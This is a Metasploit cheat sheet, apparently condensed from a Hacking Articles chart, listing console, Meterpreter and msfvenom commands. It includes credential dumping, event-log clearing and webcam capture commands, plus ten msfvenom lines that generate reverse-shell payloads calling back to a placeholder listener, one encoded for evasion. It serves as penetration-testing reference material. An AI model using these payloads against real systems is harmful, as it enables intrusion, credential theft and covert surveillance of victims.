
Metasploit Framework

Command reference for MSFconsole, Meterpreter and msfvenom.

Use only against systems you are explicitly authorized to test.
Core Commands
? — Help menu.
banner — Display a Metasploit banner.
cd — Change working directory.
color — Toggle color.
connect — Communicate with a host.
debug — Show debugging info.
exit — Exit the console.
features — List opt-in features.
get — Get a context-specific variable.
getg — Get a global variable.
grep — Grep another command's output.
help — Help menu.
history — Show command history.
load — Load a framework plugin.
quit — Exit the console.
repeat — Repeat a list of commands.
route — Route traffic through a session.
save — Save the active datastore.
sessions — List session information.
set — Set a context-specific variable.
setg — Set a global variable.
sleep — Do nothing for N seconds.
spool — Write output to a file & screen.
threads — View/manipulate background threads.
tips — Show productivity tips.
unload — Unload a framework plugin.
unset — Unset context-specific variables.
unsetg — Unset global variables.
version — Show framework / library versions.
Module & Basic Commands
advanced — Show advanced module options.
back — Move back from current context.
clearm — Clear the module stack.
favorite — Add modules to favorites.
info — Show info about a module.
listm — List the module stack.
loadpath — Search & load modules from a path.
options — Show module / global options.
popm — Pop the latest module off the stack.
previous — Set the previously loaded module.
pushm — Push module(s) onto the stack.
reload_all — Reload all modules.
search — Search module names & descriptions.
show — Show modules of a type.
use — Select a module by name / index.
Meterpreter Commands
help — Show Meterpreter help.
background — Background the current session.
cat — Show a file's content.
cd / pwd — Change & show working directory.
clearev — Clear Windows event logs.
download — Download a file from the target.
edit — Edit a file on the target (vim).
execute — Run a command on the target.
getuid — Show the server's running user.
hashdump — Dump the SAM database.
idletime — Show user idle seconds.
ipconfig — Show network interfaces.
lpwd / lcd — Show & change local directory.
ls — List files in current directory.
migrate — Migrate to another process.
ps — List running processes.
resource — Run Meterpreter script from file.
search — Locate files on the target.
shell — Drop to a target shell.
upload — Upload a file to the target.
webcam_list — List available webcams.
webcam_snap — Snap a picture from a webcam.
Database Commands
db_connect — Connect to a database.
db_disconnect — Disconnect from the database.
db_export — Export the database contents.
db_import — Import a scan result file.
db_nmap — Run nmap & record output.
db_rebuild_cache — Rebuild the module cache.
db_status — Show database status.
db_remove — Remove a saved data service.
db_save — Save the data service as default.
analyze — Analyze hosts / address ranges.
hosts — List all hosts.
loot — List all loot.
notes — List all notes.
services — List all services.
vulns — List all vulnerabilities.
creds — List all credentials.
workspace — Switch between workspaces.
Jobs, Resource & Developer
handler — Start a payload handler as job.
jobs — Display & manage jobs.
kill — Kill a job.
rename_job — Rename a job.
makerc — Save commands to a resource file.
resource — Run commands from a file.
edit — Edit current module / file.
irb — Open an interactive Ruby shell.
log — Display framework.log.
pry — Open the Pry debugger.
reload_lib — Reload Ruby library files.
time — Time a command's execution.
Payload Types
Inline (Non Staged) — Self-contained, more stable.
Stager — Sets up a connection for a stage payload.
Meterpreter — Advanced multi-feature payload.
PassiveX — Bypass outbound firewalls via ActiveX.
NoNX — Avoids No-eXecute (NX / DEP).
Ord — Ordinal payloads (small, Windows).
IPv6 — Built to work over IPv6 networks.
Reflective DLL injection — Inject a stage into memory, no disk.
Module Types
Active exploits run to completion; passive exploits wait for incoming hosts.
Auxiliary — Scanning, fuzzing, sniffing modules.
Encoders — Encode payloads to evade detection.
Exploits — Code that targets a vulnerability.
Nops — No-op generators for sleds.
Payloads — Code run after exploitation.
msfvenom Options
-p, --payload — Payload to use.
--payload-options — List the payload's options.
-l, --list [type] — List a module type.
-n, --nopsled — Prepend a NOP sled.
-f, --format — Output format.
--help-formats — List available formats.
-e, --encoder — Encoder to use.
-a, --arch — Target architecture.
--platform — Payload platform.
--help-platforms — List available platforms.
-s, --space — Max size of the payload.
--encoder-space — Max size of the encoded payload.
-b, --bad-chars — Characters to avoid.
-i, --iterations — Number of encoding passes.
-c, --add-code — Add a win32 shellcode file.
-x, --template — Use a custom executable template.
-k, --keep — Keep template; run payload as new thread.
-o, --out — Save the payload.
-v, --var-name — Custom variable name.
--smallest — Generate the smallest payload.
-h, --help — Show help.
msfvenom Examples
Replace (IP) and (PORT) with your listener values.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) -f exe > example.exe
msfvenom -p windows/meterpreter/reverse_http LHOST=(IP) LPORT=(PORT) -f exe > example.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) -f elf > example.elf
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP) LPORT=(PORT) -f macho > example.macho
msfvenom -p android/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) R > example.apk
msfvenom -p php/meterpreter_reverse_tcp LHOST=(IP) LPORT=(PORT) -f raw > example.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) -f asp > example.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP) LPORT=(PORT) -f raw > example.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP) LPORT=(PORT) -f war > example.war
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) -e x86/shikata_ga_nai -b "\x00" -i 3 -f exe > example.exe
Building Ranges & Lists
Commands that take ID or IP lists accept ranges (-) and comma lists.
jobs -k 2-6,7,8,11,15
check 127.168.0.16,15
check 127.0.0-2.1-4
Encoder Architectures
use encoder/<arch>/<name>
cmd, generic, mipsbe, mipsle, php, ppc, ruby, sparc, x64, x86
Exploit Platforms
aix, android, apple_ios, bsd, dialup, firefox, freebsd, hpux, irix, linux, mainframe, multi, netware, osx, solaris, unix, windows
Auxiliary Categories
admin, analyze, bnat, crawler, docx, dos, fuzzers, gather, parser, pdf, scanner, server, sniffer, spoof, sqli, vsploit, voip
Nop Architectures
mipsbe, php, ppc, sparc, tty, x64, x86
Plugins (load)
load <plugin>
aggregator, alias, auto_add_route, beholder, beSECURE, capture, db_credcollect, db_tracker, event_tester, ffautoregen, ips_filter, lab, libnotify, msfd, msgrpc, nessus, openvas, pcap_log, request, rssfeed, sample, session_notifier, session_tagger, socket_logger, sounds, sqlmap, thread, token_adduser, token_hunter, wiki, wmap

Compiled from the “Metasploit Framework” chart by Hacking Articles (Ignite Technologies); descriptions condensed.